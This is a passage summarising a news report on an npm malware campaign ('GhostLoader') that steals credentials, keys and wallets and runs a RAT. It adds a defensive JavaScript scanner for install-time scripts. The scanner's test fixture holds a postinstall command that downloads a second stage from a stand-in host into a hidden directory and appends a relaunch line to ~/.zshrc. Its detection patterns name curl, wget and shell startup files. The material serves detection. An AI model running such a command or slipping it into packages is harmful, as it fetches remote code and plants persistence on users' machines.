From password theft to persistence: The second-stage malware, internally referred to as "GhostLoader," is a large JavaScript bundle implementing both an infostealer and a remote access framework. Once launched, GhostLoader installs itself into a hidden directory disguised as an npm telemetry service and sets up persistence mechanisms, including shell configuration hooks that automatically relaunch the malware if it stops running.

In parallel, the malware begins harvesting sensitive data across the system. According to the researchers, the payload targets browser credentials, saved cookies, SSH keys, cryptocurrency wallets, Apple Keychain data, and personal application data such as iMessage history and email records.

The malware also has a RAT component that enables remote operators to route traffic through the infected machine using a SOCKS5 proxy and even clone active browser sessions, allowing attackers to impersonate users in real time.

The campaign includes several anti-forensics techniques designed to evade detection and analysis. The GhostClaw payload hides its behavior through heavy obfuscation and staged execution, decrypting key components only at runtime and removing temporary artifacts generated during the installation process.

JFrog researchers noted that the campaign marks another abuse of npm's ability to execute installation scripts. They advised developers to treat npm packages that request system credentials, execute postinstall scripts, or download external payloads during installation as suspicious, and recommended installing developer tools only from verified or official sources.
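The advice above (treat install-time scripts that download external payloads or touch shell startup files as suspicious) can be turned into a pre-install check. The following is an added example written for this summary; it is not code from the CSO Online article or from JFrog. It scans the `scripts` section of a `package.json` object for install lifecycle hooks and flags commands matching a few heuristic patterns. The two manifests at the bottom are constructed fixtures, and the `example.invalid` URL and `~/.npm-telemetry` path are made up to mirror the behaviour described, not real indicators from the campaign.

```javascript
// Added example (not from the article or JFrog): heuristic scan of npm
// install-time lifecycle scripts for the behaviours the summary describes.

// npm runs these scripts automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic patterns; rule ids are this example's own naming.
const PATTERNS = [
  // Fetching a second stage from the network during install.
  { id: "remote-download", re: /\b(curl|wget|Invoke-WebRequest)\b|\bfetch\s*\(/i },
  // Persistence via shell startup files (the "shell configuration hooks" above).
  { id: "shell-config-hook", re: /\.(bashrc|zshrc|zprofile|bash_profile|profile)\b/ },
  // Writing into a hidden directory under the home directory (also matches
  // dotfiles such as ~/.zshrc, which is acceptable for a triage heuristic).
  { id: "hidden-dir-write", re: /(~|\$HOME)\/\.[A-Za-z0-9_-]+/ },
  // Dynamic code execution or process spawning from the install script.
  { id: "eval-or-exec", re: /\b(eval|child_process)\b|\bexec\s*\(/ },
];

// Returns one finding per hook present plus one per matched pattern.
function scanManifest(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    // Any install-time hook is reported so a reviewer sees it, even if benign.
    findings.push({ hook, rule: "install-hook-present", cmd });
    for (const p of PATTERNS) {
      if (p.re.test(cmd)) findings.push({ hook, rule: p.id, cmd });
    }
  }
  return findings;
}

// Collapses findings into a coarse triage level for a review queue.
function riskLevel(findings) {
  if (findings.length === 0) return "none";
  const hits = findings.filter((f) => f.rule !== "install-hook-present").length;
  if (hits === 0) return "low";
  return hits >= 2 ? "high" : "medium";
}

// Constructed fixtures (hypothetical package names, URL and paths).
const BENIGN_MANIFEST = {
  name: "example-cli",
  scripts: { test: "node test.js", build: "tsc -p ." },
};
const BUILD_STEP_MANIFEST = {
  name: "example-native",
  scripts: { postinstall: "node scripts/check-platform.js" },
};
const SUSPICIOUS_MANIFEST = {
  name: "example-lookalike",
  scripts: {
    postinstall:
      "curl -fsSL https://example.invalid/stage2.js -o ~/.npm-telemetry/loader.js" +
      " && echo 'node ~/.npm-telemetry/loader.js &' >> ~/.zshrc",
  },
};

for (const pkg of [BENIGN_MANIFEST, BUILD_STEP_MANIFEST, SUSPICIOUS_MANIFEST]) {
  const findings = scanManifest(pkg);
  console.log(pkg.name, riskLevel(findings), findings.map((f) => f.rule));
}
```

A scan like this belongs in a pre-install gate or a dependency review pipeline, not on the developer's machine after the fact: by the time a postinstall script has run, the stage described above has already executed. Pairing it with `npm install --ignore-scripts` (a real npm option) for untrusted packages removes the install-time execution path entirely, at the cost of breaking packages that legitimately need a build step.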
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4142922/devs-looking-for-openclaw-get-served-a-ghostclaw-rat.html

